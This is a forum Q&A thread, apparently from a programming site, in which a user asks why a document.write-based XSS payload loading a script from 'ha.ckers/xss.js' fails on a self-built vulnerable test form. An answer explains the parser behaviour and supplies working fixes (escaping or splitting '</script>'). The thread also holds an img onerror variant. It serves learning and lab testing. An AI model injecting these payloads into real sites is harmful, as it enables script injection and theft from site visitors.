How do i load an external .js script using this syntax?:
<script>document.write('<script src=.js></script>')</script>.
For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :
<script src=//ha.ckers/xss.js></script>
Could easily work but i'm just trying to figure out how i could do it using document.write.
Thanks to anyone who is able to help me.
//Edit
Why doesn't this work?
<img src=x onerror=document.write('<script src=".js"><\/script>')>
How do i load an external .js script using this syntax?:
<script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>.
For all those wondering, i setup a test form i made purposely vulnerable but i couldn't get this to launch and yes i know :
<script src=//ha.ckers/xss.js></script>
Could easily work but i'm just trying to figure out how i could do it using document.write.
Thanks to anyone who is able to help me.
//Edit
Why doesn't this work?
<img src=x onerror=document.write('<script src="http://ha.ckers/xss.js"><\/script>')>
-
You have to escape the
</script>tag:<\/script>- otherwise the piler will end the JS with that tag and not with the right one – Niccolò Campolungo Commented Jul 3, 2013 at 22:16
1 Answer
Reset to default 1What you have to remember is that what lies within the <script>....</script> tags is opaque to the browser. Its job is, having seen <script>, to gather up everything largely without parsing it until it sees </script> and then had that intervening text off to the JavaScript engine.
In your case, what it sees between <script> and </script> is:
document.write('<script src=http://ha.ckers/xss.js>
...which obviously results in a syntax error. That's because the first </script> terminates the first <script>:
<script>document.write('<script src=http://ha.ckers/xss.js></script>')</script>
<!-- Browser thinks things end here ---------------------------^ -->
You have to break it up so it's not the literal sequence </script>. There are lots of ways to do that. Add a \:
<script>document.write('<script src=http://ha.ckers/xss.js><\/script>')</script>
or break the string:
<script>document.write('<script src=http://ha.ckers/xss.js></scr' + 'ipt>')</script>